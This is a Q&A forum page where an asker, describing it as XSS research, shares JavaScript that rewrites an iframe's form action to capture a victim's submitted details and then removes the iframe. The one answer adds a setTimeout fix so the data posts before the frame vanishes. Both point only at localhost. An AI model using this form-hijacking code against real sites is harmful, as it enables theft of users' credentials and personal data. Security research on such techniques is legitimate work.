Home/ Questions/Q 7963059
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-04T05:31:11+00:00

As part of some XSS research I’m doing, I’m trying to spawn an iframe

  • 0

As part of some XSS research I’m doing, I’m trying to spawn an iframe with a changed form action and then close the iframe after the victim has submitted their details. I have the below code so far:

<body onload="iframeEdit()">
<script>
function deleteIframe() {
var iframe = document.getElementById("myframe");
iframe.parentNode.removeChild(iframe);
}
function iframeEdit() {
var iframe = document.getElementById("myframe");
var innerDoc = iframe.contentDocument || iframe.contentWindow.document;  
var form = innerDoc.getElementsByTagName("form");
form[0].action = "http://127.0.0.1/new/page.php";
form[0].setAttribute("onSubmit", "deleteIframe()");
}
</script>
<iframe id="myframe" src="http://127.0.0.1/iframe/page.php" height="250" width="300">

That code still posts the form details to the php page; however, it fails to close the iframe afterwards. I know the iframe delete code works, as if I try it on its own in it works as it should. So it’s either to do with the logic flow of the script, or the setAttribute line isn’t working as it should. Can anyone shed some light on where I’m going wrong? Thanks!

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    There may be a better way to do this, but a work around I found was to pause the deleteIframe function, via setTimeout(). I found as little as 5 milliseconds was enough for the form details to be successfully posted 🙂

    function deleteIframeTimer(){
var t = setTimeout("deleteIframe()", 5);
}

function deleteIframe() {
var iframe = parent.document.getElementById("myframe");
iframe.parentNode.removeChild(iframe);
}

    Many thanks to Jason for the parenttip!

    • 0